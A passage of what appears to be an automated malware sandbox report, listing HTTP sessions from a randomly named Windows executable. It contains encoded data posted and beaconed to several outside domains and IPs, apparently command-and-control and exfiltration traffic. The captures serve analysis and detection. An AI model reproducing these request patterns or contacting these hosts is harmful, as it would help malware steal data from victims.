FNPd=p1Wi8zz071OLTeu876JfPRp+HvvaFFutR8K3MBwJG9lEuLXuT11SGIaSu3q4wDFMzO9pFzVVyPARAl+Bf2S2UezpGMzWFrXftO8gJnR/vkOeScxMqyfVFrNf2YMTfiRBUggjgK5MNw2EkaJ56KzdzDL1aR4jgsqag8mrGD/pgaFnEBli1lZc9O0XE7pZifdaoLHPMl19cgXGDrSudA7k4LpeQhJWC6yz02nfn7Gsq1ZdSJux5FBBmVjp+4Zl7/cYJNZM3KdFAz5Z3YRYrE+k+aCT174c3+Me9QW2XxaORdMkUfHK3kryogOvnUdgMHVNsBz8Dm6eQItNiZn7mZGJTQICamIK47RD8gzP4kNxFhK3NGei/gOm9HpvTpZ3AhLbdtWwJNmhq3orrrZhfK5k++J0XKLamVC4X75Eiao5nwnJcf6pCeudRhMajMFVfsxKu9lP6xXJ1giOHKbUm3QR7KdbBMQZFB7aEhQftTjs9MZ0j02QtKbXyWgXGA3TSJgsnpRWJnV35RlinS2wul0Lm63QiNSSkmCIVZQRmhtVEbOYchhE+pUZ3kRwHhjrVhIc0MdGGz8SdVZyv/XFZxH9cT6oXA8WMtdTqjauIo2eFAuihKK1j/6VEAtQcak6TfgFqUIHMMAA1GVK38pPj64vEEqH//Lc/3ISGdogAVRgDB92agj6ABkE0eJhMDnfkutYyi92VW1oxAHsWIMFo9n5VZZngEIfUUpiCIaMv5hsd09Q3kZwG7bSr3PMP8y2UJ29AD9kZ3yBem+dk79S2A/UMtPi6a0FYKJBa2jlICVXIOisPoOBARvqsSjIvO2s9Qt/Rq2PVgk7WorYWysH1zv/P/CqN3rZm9Dx+x5f9WuGtXpWFK+0PLBVKHGKtsaOIcSp5xhyply7utivgzIG1eUsdubnbPTfwmlTngHGVdUAdvO4f04RBPGEV2zEiZD1KkBThNY+HdLSf+gUfGHKZ1ADpoxSJJBLeNBwwXkdfmpxUmqN+T3 [TRUNCATED]


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  12         | 192.168.2.6 | 49718       | 3.33.130.190   | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:40.382894039 CEST | 500               | OUT       | GET /q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:41.188873053 CEST | 418               | IN        | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:19:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 6b 33 2b 43 2f 48 7a 31 31 6c 37 47 47 4d 62 74 79 61 4a 77 46 77 4a 70 4a 4d 44 4b 42 31 65 7a 58 76 43 42 45 77 51 76 46 73 39 4a 6e 62 66 43 56 52 34 43 46 62 2b 77 6e 51 36 2b 31 78 68 77 6a 65 67 6d 47 6b 64 55 70 34 31 6d 4e 47 43 4f 65 57 53 78 52 2b 54 2b 61 36 6a 75 57 36 4c 68 6a 70 63 52 66 45 64 38 70 57 4b 73 56 4e 4a 46 6c 41 53 33 4a 62 6c 77 70 2f 59 35 65 41 64 61 55 55 63 53 6f 4b 4d 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>
                                  May 23, 2024 15:19:41.193607092 CEST | 418               | IN        | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:19:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 6b 33 2b 43 2f 48 7a 31 31 6c 37 47 47 4d 62 74 79 61 4a 77 46 77 4a 70 4a 4d 44 4b 42 31 65 7a 58 76 43 42 45 77 51 76 46 73 39 4a 6e 62 66 43 56 52 34 43 46 62 2b 77 6e 51 36 2b 31 78 68 77 6a 65 67 6d 47 6b 64 55 70 34 31 6d 4e 47 43 4f 65 57 53 78 52 2b 54 2b 61 36 6a 75 57 36 4c 68 6a 70 63 52 66 45 64 38 70 57 4b 73 56 4e 4a 46 6c 41 53 33 4a 62 6c 77 70 2f 59 35 65 41 64 61 55 55 63 53 6f 4b 4d 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  13         | 192.168.2.6 | 49719       | 104.21.28.203  | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:46.313193083 CEST | 760               | OUT       | POST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 58 33 52 52 79 65 47 54 76 4e 38 49 70 50 5a 37 44 74 2b 64 44 70 49 39 61 45 75 50 56 78 38 4a 36 6b 4b 47 78 65 30 77 68 39 6d 5a 6e 41 57 56 4b 41 4b 2f 64 76 47 48 45 4c 6f 6d 65 64 32 68 65 54 4d 4b 71 65 69 48 76 68 4c 4f 37 57 51 75 4d 6b 6b 7a 51 51 74 73 68 58 50 4a 68 34 6b 69 73 75 77 59 64 55 73 6b 6d 5a 4a 34 52 62 4c 71 37 58 42 36 78 5a 44 43 74 64 7a 61 42 4b 2f 64 4c 75 38 6c 6e 53 32 69 30 52 74 65 38 76 6c 72 56 2f 51 42 55 32 7a 57 57 70 38 4f 65 62 52 70 72 34 59 71 53 70 39 72 74 35 54 75 44 48 43 31 78 73 33 45 57 4e 4d 6a 65 36 72 42 61 41 32 38
                                  Data Ascii: FNPd=7Z+yU7FanQKmX3RRyeGTvN8IpPZ7Dt+dDpI9aEuPVx8J6kKGxe0wh9mZnAWVKAK/dvGHELomed2heTMKqeiHvhLO7WQuMkkzQQtshXPJh4kisuwYdUskmZJ4RbLq7XB6xZDCtdzaBK/dLu8lnS2i0Rte8vlrV/QBU2zWWp8OebRpr4YqSp9rt5TuDHC1xs3EWNMje6rBaA28
                                  May 23, 2024 15:19:46.782608032 CEST | 858               | IN        | HTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:46 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:46 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAgS7eVIheWUw60c3%2F1W%2BBk5rOXr2Y9HkPaaWRs7b5fpxmBC5MwOH4bjfaskXxvJd8oUbF2PRL6uM6N3lmxCVeH3ODXJMf6EjRNqMuf%2F1I0O6c%2FPMTqUJOHzwmWI%2F5OCnvOfPT1idBiB"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 888556ed0ddb72bc-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  14         | 192.168.2.6 | 49720       | 104.21.28.203  | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:49.011176109 CEST | 784               | OUT       | POST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 57 58 42 52 69 4e 2b 54 2f 64 38 4a 6e 76 5a 37 59 39 2b 5a 44 70 45 39 61 42 65 66 55 43 59 4a 36 45 36 47 77 63 63 77 67 39 6d 5a 74 67 57 51 45 67 4b 6b 64 76 4b 68 45 50 73 6d 65 65 4b 68 65 54 38 4b 2f 35 32 59 75 78 4c 4d 30 32 51 6f 53 55 6b 7a 51 51 74 73 68 55 7a 33 68 38 41 69 74 65 41 59 65 32 45 6e 35 70 4a 2f 62 37 4c 71 2f 58 42 2b 78 5a 43 74 74 63 75 78 42 50 6a 64 4c 73 6b 6c 6e 41 53 68 76 42 74 63 78 50 6b 47 56 63 39 56 63 45 71 36 4a 59 63 30 4f 61 70 4b 71 4f 5a 77 4f 61 39 49 2f 70 7a 73 44 46 61 48 78 4d 33 75 55 4e 30 6a 4d 74 6e 6d 56 30 54 66 4b 45 51 79 39 4b 5a 4d 77 37 52 4e 7a 2b 56 67 61 63 4c 2f 67 41 3d 3d
                                  Data Ascii: FNPd=7Z+yU7FanQKmWXBRiN+T/d8JnvZ7Y9+ZDpE9aBefUCYJ6E6Gwccwg9mZtgWQEgKkdvKhEPsmeeKheT8K/52YuxLM02QoSUkzQQtshUz3h8AiteAYe2En5pJ/b7Lq/XB+xZCttcuxBPjdLsklnAShvBtcxPkGVc9VcEq6JYc0OapKqOZwOa9I/pzsDFaHxM3uUN0jMtnmV0TfKEQy9KZMw7RNz+VgacL/gA==
                                  May 23, 2024 15:19:49.705290079 CEST | 850               | IN        | HTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:49 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxHQLrPLm7pJcb0hqtr3enLJHdtx1fmfchZoHbUQ3Qzklj2IOuBTjAJEdg64aooIeZWV5rxCr6N9U%2BVksZ39jG2KtrsgLdNxNNUMAcPoKpbRZyBmRk0sEwtdbSoPedq5JAhyekd346nN"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 888556ff1dfe0c7c-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  15         | 192.168.2.6 | 49721       | 104.21.28.203  | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:51.538719893 CEST | 1797              | OUT       | POST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 57 58 42 52 69 4e 2b 54 2f 64 38 4a 6e 76 5a 37 59 39 2b 5a 44 70 45 39 61 42 65 66 55 43 51 4a 37 33 43 47 78 36 55 77 6e 39 6d 5a 32 67 57 52 45 67 4c 6b 64 76 43 74 45 50 67 51 65 59 47 68 59 43 63 4b 37 34 32 59 6e 78 4c 4d 2f 57 51 70 4d 6b 6b 71 51 51 38 6c 68 58 62 33 68 38 41 69 74 64 59 59 4b 30 73 6e 37 70 4a 34 52 62 4b 6c 37 58 42 47 78 5a 62 61 74 63 71 48 42 63 37 64 4b 4d 30 6c 68 79 4b 68 6a 42 74 61 39 76 6b 65 56 63 78 6a 63 45 6d 49 4a 59 6f 53 4f 5a 31 4b 71 50 63 4f 63 34 6f 51 71 61 6e 4c 55 32 36 56 34 59 37 4f 55 37 77 43 4c 50 76 4e 56 6d 71 77 46 77 59 71 2b 73 55 42 6d 71 64 6b 7a 2b 41 46 54 39 32 32 2f 47 4e 41 70 6a 79 61 6d 67 55 2f 58 68 41 48 72 2f 70 42 76 45 30 73 32 61 4b 6a 6d 62 45 57 4f 30 34 35 70 54 59 57 46 75 43 74 58 55 6f 77 31 55 4d 41 65 67 51 58 50 44 37 75 33 55 39 30 6c 4f 6d 4e 47 55 6b 39 5a 78 50 54 42 38 51 61 67 38 4f 42 76 66 41 53 49 35 4e 56 43 33 54 4b 55 38 62 6d 6b 6d 51 76 34 59 55 37 75 [TRUNCATED]
                                  Data Ascii: FNPd=[TRUNCATED]
                                  May 23, 2024 15:19:51.997980118 CEST | 858               | IN        | HTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:51 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:51 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cPKO0fCKvaYbqEwsP9%2FMUZiUGGlmkue%2Bm7xbvfhn5%2BbibnCe47%2FWE6TTXNuFNHod%2Bgaxy0yyHd4iO8DY58ug8fBRD1jMbcqJSL9qSXPDhSZ06YaftMvYnFzZ0qikF10TGpKURayXCsRs"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 8885570d9fe58c41-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  16         | 192.168.2.6 | 49722       | 104.21.28.203  | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:54.075609922 CEST | 497               | OUT       | GET /tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:54.636269093 CEST | 995               | IN        | HTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:54 GMT
                                  Location: https://www.featurasandals.com/tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VoGgMJYnh1vKokq3qoHL6SquveglcZ9yl2LWaYVk2PCYn4oas77LRDeTS0PzlPGajoBWxaDCQj3A4F%2FluNwz29Z4GkOPaXTe9sBiRB%2FU%2FAtjOP3JLA3VyUgVwIkjpN93m2j2473cLxpm"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8885571e186f1912-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  17         | 192.168.2.6 | 49723       | 203.161.43.228 | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:19:59.949567080 CEST | 745               | OUT       | POST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 32 48 33 54 61 31 49 30 33 4f 4d 78 70 32 34 7a 76 77 57 48 39 66 6f 4b 71 68 4c 4d 38 39 42 54 68 37 6c 70 34 79 73 68 56 65 62 6c 70 4f 4e 62 5a 6b 62 4c 44 5a 6c 7a 2f 43 34 43 4d 68 78 78 4c 76 32 7a 30 73 37 45 50 39 61 6a 65 38 72 73 37 44 72 36 77 4c 6a 4d 74 49 6a 2f 6e 33 61 73 74 55 6b 36 32 6a 2f 50 62 30 35 31 31 69 41 63 64 79 4e 47 46 69 4f 4c 71 66 69 57 30 36 30 52 39 72 71 68 49 62 6f 70 4f 6e 37 6a 79 76 48 69 32 78 5a 79 49 4f 37 35 73 73 6a 2f 52 33 36 77 45 46 73 6b 56 2f 2b 2b 4a 33 4f 66 43 32 31 73 70 64 64 38 52 36 45 6c 75 57 65 69 4a 4b 4b 73
                                  Data Ascii: FNPd=tW3/lWE17hPY2H3Ta1I03OMxp24zvwWH9foKqhLM89BTh7lp4yshVeblpONbZkbLDZlz/C4CMhxxLv2z0s7EP9aje8rs7Dr6wLjMtIj/n3astUk62j/Pb0511iAcdyNGFiOLqfiW060R9rqhIbopOn7jyvHi2xZyIO75ssj/R36wEFskV/++J3OfC21spdd8R6EluWeiJKKs
                                  May 23, 2024 15:20:00.569691896 CEST | 658               | IN        | HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:00 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  18         | 192.168.2.6 | 49724       | 203.161.43.228 | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:20:02.477355003 CEST | 769               | OUT       | POST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
